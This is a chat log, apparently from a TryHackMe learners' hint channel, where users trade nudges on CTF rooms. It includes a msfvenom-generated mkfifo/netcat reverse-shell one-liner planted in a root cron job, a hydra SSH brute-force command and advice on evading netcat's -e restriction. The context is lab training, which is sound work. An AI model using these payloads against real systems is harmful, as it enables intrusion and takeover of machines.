#room-hints
oh, where you from
can i have a little hint on today's newest box
what part?
i cant find the first username
is just a bit of a guessing game
or is it a bit of dino
dino
yes
Look around more, you'll find a hint which pushes you towards login creds
o.o
@dusky vigil as dumb as it seems, even being so close to the finish line, neither hashcat nor john want to succeed
oh you don't need either of those
huh
omg they're making me type this long flag out
how dare they
did u get root flag yet?
who?
@tranquil nymph
yup
grats
congrats to both of you!
i beat u haha
thanks heh
np
well, it took way too long for me
i started with the whole thing <2 weeks ago
so i saw it immediately
so this was a real challenge
Everyone starts somewhere!
Perks of THM is we're very open to the concept of teaching
is there a way to see times? I completed that kinda fast imo lmao
Not really
you can always time yourself
first thing in your notes, put a timestamp
my first time exploiting a crontab job to run a msfvenom payload that creates a reverse shell and I'm very happy with the outcome. But now I'm just wondering what do I do from here on? When I hit enter it just adds a new empty line and does not display anything ;?
just wait?
but it says that command shell session 1 opened
can't I interact with it or something?
@boreal whale what payload did you use on the msfvenom command
You will need to use set payload <msfvenom payload>
in metasploit
Create a payload using: "msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R"
set payload cmd/unix/reverse_netcat
I did that :? didn't I; above img
might be a case your payload is bad
by running msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
I got this from it
||mkfifo /tmp/buyrfag; nc 10.10.243.169 8888 0</tmp/buyrfag | /bin/sh >/tmp/buyrfag 2>&1; rm /tmp/buyrfag||
and I just nano that into the crontab job file
!writeup commonlinuxprivesc
Sorry, there is no writeup for this room.
;/
It's a walkthrough room so won't have one
damn
if you read the tasks
it actually tells you to use nc -lvnp 8888 to catch it
instead of metasploit
I got this
||connect to [10.10.243.169] from (UNKNOWN) [10.10.168.15] 45110||
i did?
can I interact with it?
welll
when I hit 'enter' it just creates a new blank line ;/
nah it's just a sh
yes correct
ty
any hint for 25daysofXmas, Task 9. mcsysadmin's password hash? do i generate it using the password provided?
yes
you create 2 accounts and compare decoded cookies
and based on that you create a cookie to get access to mcsysadmin's account
erm Task 9 is Day 4 which is the linux ssh task
https://tryhackme.com/room/linuxctf
-> How can I find Flag7?
What have you tried?
Which jack room we talking @echo thunder
The new one jackofalltrades or the old one Jack
Ah yeah then I can't help you, have you run wpscan @echo thunder
yes
I enumerate users using wpscan
I wanted to know if the password can be found on the rockyou wordlist
You try any bruteforcing
Personally I would use passwords from the probable wordlists
I like those
thanks
I am currently doing the 13th day of AoC, and there is this optional challenge where i must become Admin to read a file. Do you have any material about privilege escalation on Windows, one that covers just the basic stuff ?
@white salmon not one that would help you with Retro. Just enumerate harder, look around. Everywhere you can.
So I am looking for a file on the system that is executed as Admin/System and that could execute my own command (eg: change admin password) ?
passwd? If not you're going to have to clarify
It's a Windows machine, on which i must execute a program as Admin/system. So I could change the Admin password, add an Admin user, modify my own privileges, etc..
So I was asking if the challenge is to find a way to execute my command with higher privileges
@white salmon nah you need to just keep looking around. You'll find something
anyone have any luck with mrrobot's dictionary list?
tried hydra, wordpress, and burp brute forcing and the length it takes is ridiculous. I peeked at the writeup to see if i was on the right track and verified the PWD was in the dic file but was like 800,000 one. would take days to get to that at the speed these tools work. any suggestions?
are you using the right dictionary @rain sorrel
yes i was using the one on the box @past night. Which i presume exists for a reason f*****y.dic
yup, that's correct
i let it run for over an hour and i was barely on line number 3000
they buried the actual password down at the 800000 line
default. i guess i need to read the man for hydra. wasnt sure i could customize the threads. its a vm so i normally leave it at default
yea
virtualbox?
anyway, just give it some more ram and cpus to make sure it doesn't clog itself up
okay. any recommendation on tasks per host? i see default is 16. is there usually a golden rule or good practice?
thanks btw
no problem, anytime
idk lol, i usually hand it 32
i just leave the stuff running for longer too
got you. im going to run it again and see what i can do. at the rate i was running it would have been next month
yea i wanted to leave it on over night but had to keep refreshing the dang time
it's not mandatory i think
i am subscribed so i usually leave my box cracking passwords and use the THM kali for other stuff or the other way round
is it possible to precent my active box from terminating after an hour without having to add an hour?
prevent*
unfortunately not :c
nope
got ya. well the bumping up the threads will help. saved me a week worth of work lol
hmmm yea good point
that's a vim thingy, i suck at it
break it up. Lol yea vim is a PITA
so consult the oracle - google.com
get yourself a cheat sheet for it
so i normally use nano which doesnt help sometimes in a shell
did that for tmux aswell, really useful
people that use vim are on another level
oh definitely
lol yea i aww at ippsec when he casually uses it
i know how to :wq!
I prefer nano over vim
^
I don't need my text editor to be a programming language
can nano work in a shell?
+1 ^, also we are moving away from the subject of the room
yes
Yea
We can debate text editors in #thm-community-media
#thm-community-media for this
oh god, someone's going to mention emacs next
Steel Mountain I am missing the first word for task 2 item 2. It's really driving me mad because I have all the others (I assume).
Any pointers for that first word only please?
Never mind got it
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
Does this mean that the user user is a part of the adm,cdrom,dip,plugdev,lpadmin,sambashare groups?
yes
so how would i go about solving #6 of day4 adventcyber?
"What is the sha1 hash of file8?
The file is basically just this. Decoding from base64 doesn't help either
2oM+RWseZkvUn+oiVFZ/iYzFK/oTKVbpp0WC1vjpKt9uRVYvL5lyjWUG5tYXf1+k
KoM+EFTh7OH7LnvA+eA8jQ==
Yeah. that's not how you work out the SHA1 hash
Google "Linux get sha1 hash"
Mhm
why do i always overcomplicate ;(
alright i got day4! It took some lateral thinking to get there
hello guys I cant get a file made in /home folder, task 33, Learn Linux..
I tried linking, copying, touching etc.. is there another way?
I have a hunch
@rotund kraken Not /home
That it might mean your own home folder
You want your home
i.e. ~
ahhh
arigato!
misread
love it, I subsribed today! yeeeeyyy
subscribed*
hahahahaha the dumbest thing is that I already saw the password output 40 times. I didnt realize its the actual password because I thought I had to make a file in /home
thnx guys/girls!
@rotund kraken hehe welcome aboard! you're gonna make a lot of mistakes and sometimes some really basic ones (wink wink MuirlandOracle) , but hey enjoy the journey and the learning process!
@green prism Thank you! Back to the grind!
@inland onyx I am working on Blue and need to crack the password hashes. I am not sure I did it right. I ran hashdump, copied the hashes to a custom file, ran john against the file, but when it ran it didn't show any credentials and now just says "No password hashes left to crack"
I haven't touched jtr in about a month and unfortunately have forgotten a few things
Check the potfile
I'm a hashcat guy, so I can't really remember the command to show them. Might be --show
Hmm, then I must be off. I did ||john --show temphashes.txt|| but it just prints out the hashes themselves and "3 password hashes cracked, 0 left"
Like I said its been a hot minute, I might have messed up before this step
yeah people have had issues with it
There's an NT hash and an LM hash in there
Try hashcat
is the one in /usr/share/wordlists/ not good enough?
it's not updated
really?
oh lol. I just saw it in the hint and didnt know if I needed to update
@green prism yes, because it's all one breach from like 2008
2009
WOW good freaking grief. I need to have a written checklist for when I re-build a kali image. It didnt work because on my new VM it didnt pull out the actual rockyou.txt file so john couldnt find it lmfao. Now it worked no problem
Did you try it with the zipped version?..
Mhm. Pretty much everything else borks though
No I was just generally messing up. All is right now
Cool, had to terminate and start the machine again to get flag2 but Blue is now done, yay! "Getting Started" is finished!! Now I can move on to "Complete Beginner"
Yup yup. Nasty bug
hi
hello guys, somebody can help me doing alfred room? i was stuck on meterpreter shell. i didnt get connection back to my handler
Hello Any hint on JackofallTrades
Hi all, i'm on Learn Linux room (beginner's path), i'm stuck at a question because i think i don't completely understand what it is requesting me to do:
"This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable."
If i try to execute the binary i've got a Core error. I don't understand what the site is requesting me to do, please hints
@terse yew did that spoiler give you what you needed to know?
?? @inland onyx
@terse yew what are you stuck with?
Somebody? I really don't understand what i'm supposed to do
@white salmon set the environment variable, THEN run the binary
port 22 http,port 80 ssh...when i tried to visit http service in browser that is browser restricted service so how can i browse that @inland onyx
@inland onyx so with like export <varname>=<value>, where the varname is the test1234 and the value is the current user?
@white salmon Mhm, but not the current user directly. The contents of the user variable.
@terse yew that is a question for Google. "how to access restricted ports Firefox"
@inland onyx Alright, i think i didn't quite understand this concept of user variable and environments variables
I'll go Google for further investigations
Good idea :+1:
Because honestly i didn't get it at all
User variables are kinda like local variables. They exist only within your current bash session and can't be accessed anywhere else.
Environment variables can be accessed from anywhere. Kinda like global variables in programming, but even wider.
Definitely worth googling though.
Thank you @inland onyx
Though i'll have to google this stuff because it's not clear in my head what are they for
You know when you @inland onyx read and understand a thing, but can't quite pop out a picture of it in your mind, so you aren't able to place it in its right position in the wider scheme
That's where i am
I would suggest experimenting with them then
First i'll have to read further, because for example i can't quite figure out what they are there for, you know. I know it's silly, but when you're autoteaching yourself you often go down in holes like this and have to figure it out
Same thing all variables are there for -- to store information.
Environment variables are used to store things that you need all the time (like your PATH)
They can also be used to store things like passwords to avoid hard coding them into programs, but that's usually done slightly differently.
Wouldn't the system know what my (for example) home path is if they weren't there?
what would happen if the path /home/user/ didn't exist as an environment variable?
That isn't an environment variable
Your PATH isn't /home/user
Try doing echo $PATH
alright, but..
It's a list of places to look for executing programs. Your path is the reason that you can type a command and it executes, without needing the full path. So, for example, ls rather than /usr/bin/ls
Hmm?
Basically, yeah
No, the $USER variable stores your username
Current user
How can i see all the environment variables?
How can i list them
ls -a $?
Usually printenv
Alright
So this is what i do.
Printenv something, to see if the variable exist
Referring to the question before
If it doesn't i should export it, where the variable shall be the name of the variable who doesn't yet exist and the value shall be the path of the binary file?
Uh, what do you mean?
Generally speaking if it's a custom variable then it won't already exist
Hi all, i'm on Learn Linux room (beginner's path), i'm stuck at a question because i think i don't completely understand what it is requesting me to do:
"This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable."If i try to execute the binary i've got a Core error. I don't understand what the site is requesting me to do, please hint
@inland onyx Was referring to this
If the default ones aren't there then, uh, you've got problems.
Yes. You need to create a new variable and set it equal to $USER
Then run the binary
Because otherwise it's going to be looking for something that doesn't exist
Giving you a segmentation fault
Like before
This way you are 'tested' on knowledge you gained in previous tasks
Why i have to do that in order to run the binary
Because in the binary is it specified the variable test1234? is it?
This way you are 'tested' on knowledge you gained in previous tasks
@glossy basin Yes Swafox (and good morning!), but knowing how to do a thing isn't knowing Why
Mhm. The binary will be checking to see if test1234 exists and is set to the right thing
it is set to check if variable test1234 is equal to $USER
Because in the binary is it specified the variable test1234? is it?
Alright
Now i've been all the way around and closed the circle
If you get what i mean
yes. i certainly do
Thanks @inland onyx!
Thanks @glossy basin !
how to identify an encoded text, like which encoding technique is used
Experience, mostly, @terse yew . It's difficult at first
Enumerate harder. @echo thunder
Look around. What can you find out about the blog?
Users? What blog software is it?
These questions are for you to answer for yourself
Don't tell me. This isn't a walkthrough
hi guys
I am doing the learning path: Learn Linux can someone hint me task 43? I tried a lot like the linking but it didnt work.
!writeup zthlinux
awesome thank you!
Np
@inland onyx Also I went on and I am stuck in Linux Challenges task 3 #5, find flag 15: when I use hnc** I see 2 hashes but those are not working.. the command u**** -* does not give me money either any nudge here? thanx in advance
if you want to censor things, you could use ||spoiler||
oki ill try
Also I went on and I am stuck in Linux Challenges task 3 #5, find flag 15: when I use h***n***c** I see 2 hashes but those are not working.. the command u** **-* does not give me money either any nudge here? thanx in advance
*djeeezzz finally got it ! thnx @stuck fractal
hmm oki
If you get stuck, try explaining your process out loud. It's called rubber duck debugging
I am srry I meant I got the escaping the asterisks
Ill go ahead and proceed and go back when I finish the rest
Need hint for this please...
It's exactly where it says it is
so to get into root folder i need root privs.. but how to get them ?
it tells me i am not in the sudoers file
It's not magic, you just gotta search
and i cant access sudoers file
Sudo isn't the only way to get root
I mean, that's not really a hint, but ok, Muri :p
@inland onyx Hints, this is before writeups come out
This is nudges
@inland onyx reee bad
Hints channel
This is nudges
@stuck fractal Ah, room-hints
Ach, fine. @raven prism look for unusual files
And if you feel like you need more help, then look at my beloved writeup
you can't undo history, Muri!
(May or may not have completely misread the channel name. Doing a lot of other things at once...)
only toasting allowed
I feel rich. I just managed to buy milk, eggs and bread
yes, "managed" and "I"
please don't make "milk" at home, Muri :I
yeah yeah, you caught us
In the blue room, I used nmap but it always says all ports filtered
I downloaded the vm for offline use
but when I scan for hosts using nmap it says no hosts up
What room?
blue
Blue.
Do this room first
yes its working
Can you screenshot the results of ps aux | grep openvpn?
vpn is working, I've used it a few times
could you tell me about using the vm offline?
What do you mean?
yes I did and I again got all ports closed
Try it with -Pn
Are you scanning the right IP address?
And the machine is definitely up?
Did you give it some time to boot?
Hi Guys, I am on the BrainStorm of this OSCP path and have been stuck on it for quite a long time. 1. The Nmap yielded 3 ports but I "brute-forced" the answer and the answer is some other number instead, I tried to use different scans but other than these 3 no luck. Are the rest of those ports the result of the BoF part? 2. I have managed to get the executable and am trying to run it on a Win7 32 bit VM but nothing pops up. and also on Kali using DosBox and failed to load too. Shall I jump straight to the overflow part?
-p-
did the -p- 20 mins later still 3 ports
the answer to the question is a bit more than 3. and hint is pointing to NMAP so I really got confused by this part..maybe the rest of ports are not applicable at this stage?
is day 18, from Advent room, meant not to be passed?
I am having trouble elevating rights
Day 13.
It's intentionally set up that way
Look in the advent chat and you'll find the solution @white salmon
ok,thx
In Linux Common Privesc it asks what critical file has had its permissions changed and I know what file it is from the hint but I am not sure how they found that out
@white salmon The later task tells you this
Ah okay cool
And why it's had the permissions changed
I'm pretty sure we went over this together the other day
We were talking about SUID if I remember right
But I still had to look over my notes for that today as well
One thing's for sure I'm not as competent in linux as I thought, but so far really enjoying this "Complete Beginner" learning path
Hi im stuck on question #8 on RP: Web Scanning. i cant see any specific xss alert and certainly nothing matching the answer format. Anyone give me a nudge?
in room Common Linux Privesc , Task6 #2 Having read the information above, what direction privilege escalation is this attack? What does it mean, i don't understand
ahh yes thanks i got it now @weary fox
Can someone help me with number 4 on task 9 of Common Linux Privescl.
I am not sure where to start
@weary fox Read through the text with that
the only files that I found were bin/bash and usr/bin/bashbug
but it has too many characters for the space
ok
Hello there ! who is agent R ?
enumerate more
i can barely see that
we need a better version of that thing, James. You use it so often, but it's so smol
you really need !dark, or whatever it is
@hazy jewel everyone know what's there
Except the people who need to know what it is
The hint for the question is this but when I look at the paths all I get are these
@stuck fractal
You're really not understanding how it works
ok
are any of those paths I posted correct
and also does it start off with echo >/File
this is hints, not answers
Learn and understand
Work out what's happening behind the scenes
Don't brute force the answers
Ok
james! how can i get that? i don't understand the hint. (agentsudo room)
@distant oasis the hint is reverse image searching, and telling you which article to look at
I know the admin password from my previous experience with Juice Shop. In my opinion guessing it is quite hard without any experience in this field, or is it just me? (https://tryhackme.com/room/juiceshop; Task 5)
If I remember correctly I did have the hash of the password from another task I solved before, by guessing it would have taken me really a lot of tries. Is this what you're trying to achieve to improve one's "guessing power"?
And, in general, I think that there's not enough explanation in this room. I do have at least some experience in this field so some of the tasks are quite easy for me but only because I did them before.
Hi im stuck on question #8 on [Task 3] RP: Web Scanning. i cant see any specific xss alert alert tab and certainly nothing matching the answer format. Anyone give me a nudge please? What am i missing?
Hi all guys, i'm stuck in the room Learn Linux, trying to catch the flag containing the password of user shiba4. It's a binary file. I can't seem to find it anywhere
I even manually checked every f. folder
and by the way where did the Room hints section go? It was there this afternoon!
This channel is designed for members of the community to help themselves before asking mentors and mods
As in you ask here, other people who have solved or may know how to help will answer
Well, i'm asking to the general public Paradox
Not specifically to any mod or mentor
But thanks for the hint
And someone from the community will answer
Just clarifying
I hope so
It's somehow very frustrating, i'm sure you know
bruteforcing: does it work if you use the same wordlist for the username as you use for the password?
It does if one of the entries is a username and another of the entries is that user's password. That said, it'd likely work better if you had a username list, as a typical wordlist is centered around common passwords. But that gets a little dicey. A list of usernames is technically a collection of personal information and such.
It's theoretically possible given the right wordlist, but it squares the time to exhaust all options
That's how it is for any enumeration or spray attack, though
So, if your wordlist has 16.4 million entries, there's now 16.4 mil * 16.4 mil possibilities
That.. is a big list.
I had colour on my mind
Pink?
256^3
Aight thx guys
transparent isn't a color
After a lot of reading and research I finally figured out what I was doing wrong
Thanks for the help @stuck fractal
Rpmetasploit: how can I find the spool service?
Because it's nonsense :p What are you trying to do?
Also that screenshot has answers
Oh sorry
Can someone help me? I tried everything I don't get it.
I mean, you didn't try the right thing :p
ye you right
Follow the description, step by step, and build a mental model of what needs to happen to solve it.
the actual solution isn't complex, you just need the right stack of actions
@thin river pay close attention to the question. It is checking to see if test1234 is set to the $USER variable. Which means if it isn't working you might need to manually set test1234.
Don't worry, I got stuck on this too for a minute
You will need to set the variable
It's not set automatically
That's the challenge
nope
:C
check what you've learned about the environment variables in the task just above @thin river
It is written, if you read accurately. How do you set a new variable?
When you get stuck, it sometimes helps to go back a few steps
like this?
Quite
Now read accurately what is requested
is there another way to go around the privilege escalations for windows for day 13 in Advent room? I tried a dozen of them
@Dalosu the binary is checking if the variable test1234 exists
now which is the variable and which is the value in that export command
i though cmess room was dun :)this one is even more challenging :)))))))
dfun*
fun*
@white salmon the variable is test1234 and the value is $USER right?
@Dalosu so it's the opposite of what you wrote there, right?
LOL
Try the opposite. I think it won't work
Because, which is the current user? You know that, right?
Shiba2?
yep
Got it @thin river ?
i am constantly disconnected from kali is there any reported issue ?
@white salmon #site-support
i wasnt going crazy before zap wasnt showing the xss alert for the question
still isnt when displaying it when scanned, had to see it on the write up so not sure if the issue is my end or not
I know we're meant to stay out of this channel now, but I've seen two people complaining about this issue
I will give it a go for you and check if it's broken for me too
question #8 on [Task 3] RP: Web Scanning
I know it has previously worked
you getting same?
Just scanning now
Nah, I get it with ZAP
@daring elbow @still sail I have made sure the ZAP XSS question still works
It does.
weird i can scan it again and dm you a screenshot ?
@daring elbow yeah, DM me a screenshot
(However it seems it may be kinda buggy for other people)
"A third predominant address type is typically reserved for the router, what is the name of this address type?"
Totally dont remember this
Any hints?
Given the community appears to be asleep just now (we'll usually be staying out of these chats ftr):
Think about what address you'd connect to in order to connect to the internet. It's the address of your router on the network
Begins with a g
Honestly didn't know we called the address that as well. Always just pictured the router(s) themselves in my head. Tyvm
Np
I've run a vuln scan and a few ps and service scans but still can't find the spool service
Since it's ded, ps will get it
But it's not quite called spool service, it's a shortened version
What
Yep
A third predominant address type is typically reserved for the router, what is the name of this address type?
for some reason I can't figure this 1 out ;/
any hints?
room/bpnetworking
@boreal whale Literally look about ten messages up in the chat
;D
room/rpnmap
How do I set the timing to the max level, sometimes called 'Insane'?
can't find this 1 in nmap -h ;/
There should be numbers 1-5
just found it, :D
thanks
Hi guys, any one can help with learn linux, task 33?
Check the chat history. Someone definitely answered your question
how am i supposed to access the shadow file if the user in challenge 4 (Advent of Cyber) hasn't got the permission?
@autumn sage what is the task 33 anyway
menu greyed out.unhide not saving.im trapped on this room :)
Advent day 13
done
Im doing the room https://tryhackme.com/room/crackthehash and Im on the last task but cant seem to format the hash correctly in the file
I've tried <hash>:<salt> where the salt is in ascii but that doesnt seem to work?
@noble zinc have you checked writeup
because it's hard to give hints on that one without giving the answer
yeah
I got the answer but I cant seem to get the format of the hash right to solve it myself
What's the best way to find the username and password in https://tryhackme.com/room/webappsec101, Task 4 #4? I tried using the wordlist mentioned and Turbo Intruder in Burp Suite which made more than 10,000 requests but didn't find any login combination. Is %s correct for both payload positions?
And what is a "flash form" as mentioned in the same room in Task 5 #3?
Hi guys, i'm on Linux Privesc room right now and i have some doubts about what should i do to exploit a cron job,
because i don't necessarily understand how to use msfvenom
My questions is
(related to the snap i posted) From where should i give that msfvenom command to create the payload?
I should give that to the terminal in my own kali, right?
Correct (as far as I understand that)
Alright, then, how am i supposed to echo the payload into the autoscript.sh if it is in the other machine?
I tried that yesterday but the payload in the cronjob didn't connect to my netcat listener. And I still don't know why. It should have.
By copy&pasting the payload
Ok, so from one terminal session (kali my own vm) to the other (sshed into the machine), correct?
msfvenom is putting out some code which you then can paste into the .sh file on the other machine which then, in theory, should be executed every five minutes.
And then go back to my own vm terminal session of kali and start listening on port 8888 to have a reversed shell
right?
You have to make sure that you have one machine which can be reached by the other machine. Running netcat on a local machine in your own private network at home won't work.
Exactly. You just have to make sure that the machine you're exploiting can reach the other machine with the listener on it and that the port you chose is not blocked by a firewall or anything.
I don't understand. What do you mean?
Ah, yes, exactly. Unless you have a firewall of any sort running which is operating in deny all mode.
No firewall, no problems, so to say
And as far as my understanding goes lhost it's me, my own machine, because i'm telling msfvenom to create a payload to give a reverse shell and send it to lhost trough port lport
Just to clarify, right?
That's how I understood it. On the other hand I couldn't get that exploit to work. But the other way round it wouldn't make any sense, would it?
I'm guessing no, because how would the payload content knows where to send the reverse shell otherwise?
msfvenom is for creating the payload
The payload is being executed on the victim computer thus this computer is connecting to my command & control server which IP the payload has to include.
and cronjob executes things in a determinate time
so
So we input the content of the payload created by msfvenom into the cronjob we want to get a shell from
That's what I think, yes.
The cronjob starts, the reverse shell pops up into our terminal
Exactly
you have to set up a listener with nc
Ok, let's try if i'm luckier than you @gentle cobalt
with the same port you specified in the msfvenom
Thumbs are pressed
If one can say that in English
Anyone can answer my questions regarding webappsec101?
Where should i get the content of the payload to input into the cronjob now?
It's really nice to see you all helping each other out in here
Well done!
Remember that if you need it, there is now the second tier of #692465827143876689 if you don't get the answers you need in here or #room-help
It should have been printed on your stdout, thus your terminal.
Isn't there any code?
@inland onyx Will do, thanks for the heads up
is it the thing that begins with mkfifo?
Yes ^^
I guess so, yes
@white salmon the content should appear in the terminal that you set up a listener
ok /D
That's a really cool payload by the way. A good one to remember for if you don't have msfvenom
Good to know, thanks for the hint.
Worth working to understand it as well though. but yeah, make a note of it
It's more complex than a standard nc reverse shell, but more likely to work in systems that block -e
That traditional way of sending a reverse shell with netcat was to do -e /bin/sh -i, if I remember correctly
Been a while since I've done that specifically, given it was blocked off a while back
Either way, -e allowed you to send a command to the listening machine
Netcat stopped it because, uh, people were using it to send reverse shells...
Using a pipe in the form of a fifo gets around that
Also, does this look good to you guys?
Can i save, exit, go back to my terminal in kali and start the listener?
You can -- although there's no use for the last three lines anymore
And i cannot save it, cause permission denied
If i echo the content of the payload
I get this
Try sticking the bit you're trying to echo in quotes
Ok, i'm not the right user to write the file
Ok, i echoed the content of the payload, but i had to bash: /tmp/lireroj: Permission denied rm: remove write-protected regular empty file '/tmp/lireroj'?
Now i've started the listener
Let's see if i get back from it
And... "He kept listening for seventeen thousand years", and... "He became old and gray on the path of linux privesc".. and... "He thought about the good times he had not".. and then "he died upon backlighted keyboard"
;D
Nothings happens at all
go to /etc/cronjob
crontab?
cron.d, cron.daily?
@white salmon http://thecodelesscode.com/case/9 :p a bit unrelated, but yeah
crontab
@bitter crane :D,
alright @white salmon , i'm on it
i've got this */5 root /home/user4/Desktop/autoscript.sh job
scheduled
every minute should execute the script
set up a listener with the same port that you put on the payload
i did
(That'll execute every five minutes)
true
mb
I'm all in for it
Oh
The autoscript.sh is completely blank now
i've just catted it
It wasn't before, before i echoed it
this bitch
Ok, i rewrote the script as it was now, putting the payload content in it also.
Now i'll restart the listener
"Jimmy said when he was just five years old, you know... Nothing happened at all!"
"One fine morning he putted on a new york station he couldn't believe what i heard at all.. not at all!"
I'm doing musical entertainment from Lou Reed
But nothing happens really.
try to cat the script to be sure you echo it
Looks like it
Oh i see why
I gave the lhost the eth0 value
And not the tun0 value
Which must be the vpn connection
Yeah, now it works.
I mean, i'm receiving stuff now
But not a shell for now. I've got a 10.10.174.110: inverse host lookup failed: Unknown host connect to [10.9.whichisme] from (UNKNOWN) [10.10.174.110] 48510
Yeah i'm in
It was a silly thing, but it feels nice
Thanks guys
@inland onyx @white salmon @bitter crane (for the poetry) @stuck fractal
hehehe c:
any hint for learn linux box for root flag
The last one?
Why can't you get it?
@cursive knoll IDK how far you got but make sure there isn't a 7 in the fixed part of your cookie
Well that was the right person, wrong chat
haha
A third predominant address type is typically reserved for the router, what is the name of this address type? Any hint for that question
@noble zinc What role does the router usually play for the hosts on the network?
@inland onyx thanks
hmmm
i can run script like peas
a mediator?
but i see no use to it. makes me a script kiddy
Using tools doesn't make you a script kiddy
Using tools without trying to understand anything does
besides, you gotta crawl before you can walk
just keep on trying. Never be satisfied with not knowing, but also give yourself time to learn
Anyone completed the Mr Robot CTF challenge? I have a question about the challenge,
I have finished the challenge now SO I do not need help per se
When I inspect the page source for the target ip URL I find an IP address there that is unused throughout the entire challenge. Is this a rabbit hole?
I have run nikto against it as it has port 80 open and pow it's spewing things at me like this
OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
I need to know if I am actually allowed to look at this or not?
Can any one help me understand what I am doing wrong. I think that I am using the right command to get the cookies for the server, but it keeps on saying this.
@weary fox Cookies are a part of HTTP headers
They are not a part of the HTTP request body
CURL doesn't show the headers unless you tell it to
You can also use a browser and the devtools to view cookies
ok
(you can put curl into verbose mode to show the headers)
Anyone ran into an error like this when trying to migrate processes?
Gotcha, I thought it was weird, I literally ran that last night lmao.
hey can someone give me the btc address from this room (Task 3 # 3) website no longer available https://tryhackme.com/room/torforbeginners
@white salmon Nah it's probably available but you don't have something set up
no the website is not available
@white salmon ?
It won't work just in firefox, you need to be connected to TOR and get tor working
I know it's tor
Can you get anything else via tor?
yes
Any other onion sites?
yes
@glossy basin Might need to take a look again
Day 18 Advent Room,not able to connect to the machine:3000
any known problems
vpn is up
how can i exploit microsoft iis httpd 10?
@white salmon I could connect yesterday, try letting it a bit more time
i postponed the task for later
Does anyone know if the day18 of AoC is still up to get the cookie ? I have everything set up, but it doesn't seem like the admin is going to connect/has connected (for more than 20m now). If it isn't maintained, is there still a way to complete the challenge ?
Good morning hackers.
Does anyone know what room covers attacking a metasploitable box? I see a badge for it
That one does say it has a badge, but Idk if the rooms actually say they give a badge.
I did the really basic Metasploit one last night
afaik all rooms that give badges say so in the little awards thing
look at the 'options' and find it
options for set?
yes
I'm stuck with some of the tasks in https://tryhackme.com/room/webappsec101.
Task 5, #3: I found the Flash file but only in the Target view of Burp. On which page is it being loaded and does Firefox interpret that at all?
Task 6, #1: Each time I try that the application crashes. I read the hint and used that symbol but no matter what I put after the pipe the application crashes.
Task 7, #2: When I try to use a directory traversal on the page mentioned in the hint the application crashes as well. I used the traversal as a parameter for the picture id thingy.
Task 7, #4: How do I approach that? I tried the obvious like using words like "free" but without success.
On Steel Mountain question 2; name of file server..anyone help with me with correct format/syntax, I found the HttpFileServer 2.3 . ive tried everything i can think of..
any hint?
@lament ibex there's a hint on there
yea but still no idea what it is
Trying every possible password until you find the right one, not breaking the cryptography through cryptanalysis
yea idk
Look at different types of attacks on cryptography
Ninja's hint is really good
they are always good.
A third predominant address type is typically reserved for the router, what is the name of this address type. A hint for this? Also is this case sensitive?
@rotund kraken You'll want a capital letter at the start
Go over everything you already have
Hi all, Linux Privesc room here. Trying to exploit $PATH.
I don't understand what the last * ** should be
@white salmon do you mean the last one?
Hi all, Linux Privesc room here. Trying to exploit $PATH.
Anyone?
@inland onyx ok i think i need a hint for the privesc (room = willow)
didn't find anything useful with suid, sudo apparently has NOPASSWD for mount but that's not actually working, cronjobs not vulnerable from what i can see, and didn't really find anything else
zeitgeist db was empty too apparently
Hey ! Anyone has done the CC: Pentesting Room ? It's asking the flag for ping scanning with nmap and apparently it's not -sP so I'm wondering if i got it wrong or if there's a problem with the room
@white salmon The answer for that is in the task description
In the paragraph
It's a fill in the blanks really
@woven cosmos you don't have to use -sP for that
Ok thanks !
just perform a usual scan and find what you need
got the smbshare password for milesdyson on terminator, but having issues logging in with smbclient?
hmm, in the room basic pentesting when attacking ssh for the password i am pretty sure i got the right command (tried username in upper and lowercase too) but its not finding anything
||hydra -I -t 4 -l Jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.27.35||
the task says brute force but for an actual brute force attack instead of dictionary the complexity is too high, it's 7 chars
@tranquil nymph Dictionary is a type of brute force
i suppose thats true
but then i don't see the problem with my command, it's been running for a while now
ugh.. it took 20 minutes to brute force
not cool
its hydra vs ssh, idk
Oh, hang on, you thread limited it didn't you
ohh
But it works
well, the more you know
You can do a ridiculous number of threads with Hydra -- I know a guy during cyber advent bruteforced the web password for Hydra day in a few hours with something like 2500 threads
Doesn't really matter power wise for hydra
oh?
The threads matters more serverside
Parallel login requests, or not overloading the server with password hashing
Mhm. Depends on how many simultaneous tasks the server can handle
HackerNote can't handle that many as it's Bcrypt behind the scenes
You basically DoS the server as it's running on a tiny AWS VM
Asking again, couldn't figure it out last time. On rpmetasploit: how do I get the spool service in "we're in, now what?"
ah, thank you!
@ruby junco do we need to bruteforce in this room?
Probably not a good room to start on if you're new to cybersec
i know im trying the only port works for me 8080 and 8009 is not working
im beginner tho
yeah, ghostcat is not that easy
i know im struggling with it
@past night DM me your route and I'll tell you if it's correct
@ripe needle It's not a beginner friendly challenge
@ruby junco do we need to bruteforce in this room?
@past night It is necessary for the files that you will find inside a user folder.
thank you i was thinking it its easy but i think is not for me
i did a lot of searching in google but nothing
@ripe needle DM
kindly help over this Who is the employee of the month?
room: steel mountain
hey, so i'm doing the OWASP Juice Shop room, and I got up to task 5 'Broken Authentication', where I have to find Jim's secret question
The hint says ||try look for more information on Jim||. Does that mean OSINT?
Like should my approach be to find an online presence or something?
What's up
im having some trouble running a binary anyone around to help out?
@white salmon which one
the Imgur link in "ccstego" task 7.2 does not work? or is it just me?
Hey @jaunty relic I've completed the room (and will send proof) but can't quite remember the link you're talking about. Mind shooting me over a DM and I'll try to replicate please?
Discussed with user, ran through the task again and URL works, fyi
Need some suggestions for a dictionary list in bruteforcing the Jack machine
bruteforce all day but nothing happened lol
hi all, working on tomghost room - need some help to root.
Hello guys, I need a little hint in the pentestquestionaire, I answered all the questions except (Flag used to load a list of hosts.)
man nmap
is there a writeup for avengers?
!writeup avengers
Sorry, there is no writeup for this room.
nope ;/
:/ did you do this room?
give me 1 second, I'll check it out
what kind of browser are you using?
firefox
So, when you open the Network tab you'll have to refresh the page, ex. F5, then your browser will make bunch of GET requests to the server, you'll have to find the very first GET request, it looks like this
then click it and on the right side look for the Response Headers
ah thx i looked under the wrong tab
